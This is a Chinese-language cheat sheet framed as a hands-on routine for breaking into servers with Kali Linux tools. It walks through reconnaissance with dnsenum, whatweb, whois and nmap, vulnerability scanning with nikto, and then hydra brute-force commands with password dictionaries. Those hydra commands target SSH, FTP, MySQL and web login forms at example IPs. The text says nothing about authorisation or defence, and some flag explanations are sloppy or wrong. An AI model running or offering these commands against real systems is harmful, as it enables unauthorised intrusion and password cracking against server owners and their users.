kali入侵服务器的那一套实战

dnsenum -enum xxxxx.com 枚举出网站的所有域名和服务器的ip地址

打开百度查询ip地址的所在地

whatweb xxxx.com 查看那些网站入口可以访问 以状态码为准

whois ip地址 查看ip所在地

nmap -sS ip 匿名查看服务器开放的端口

nmap -O或-A 查看服务器的什么系统

nmap -sV 查看服务器开放端口以及服务器版本

[nikto]

漏洞扫描-T 选项包含了许多小选项，-T 9 表示扫描sql注入漏洞0检查文件上传页面1检查web日志2检查错误配置或默认文件3检查信息泄露问题4检查XSS/Script/Html问题5从根目录检查是否存在可访问的文件6检查拒绝服务器问题7从任意文件检索是否存在可访问文件8检查是否存在系统命令执行漏洞9检查sql注入漏洞b识别安装的软件版本c检查源代码泄露问题x反向链接选项

nikto -h ip 普通扫描全部漏洞

nikto -h -h ip -p 端口号 扫描指定端口漏洞

nikto -h ip -C all all表示CGI目录猜解

nikto -h ip -T 9 扫描sql注入漏洞

知道漏洞后开始爆破

[hydra（九头蛇）]

-l 指定爆破帐号-w 指定每个县城的回应时间为10-P 指定密码字典-t 指定爆破线程-v 指定现实爆破过程-f 查找到第一个可以使用的id和密码的时候停止破解hydra -l root -w 10 -P passwd.txt -t 10 -f ip地址 sshhydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysqlhydra -L user.txt -P pass.txt -V -t 10 ssh://192.168.0.1:22 暴力破解： 参数： -R 继续从上一次进度接着破解 -S 大写，采用SSL链接 -s 小写，可通过这个参数指定非默认端口 -l 指定破解的用户，对特定用户破解 -L 指定用户名字典 -p 小写，指定密码破解，少用，一般是采用密码字典 -P 大写，指定密码字典 -e 可选选项，n：空密码试探，s：使用指定用户和密码试探 -C 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数 -M 指定目标列表文件一行一条 -o 指定结果输出文件 -f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解 -t 同时运行的线程数，默认为16 -w 设置最大超时的时间，单位秒，默认是30s -v /-V显示详细过程 各协议的具体命令： 格式+示例：

1、破解ssh： hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp： hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交，破解web登录： hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

4、post方式提交，破解web登录： hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:" 参数说明： -t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当破解了一个密码就停止， 10.36.16.18目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解,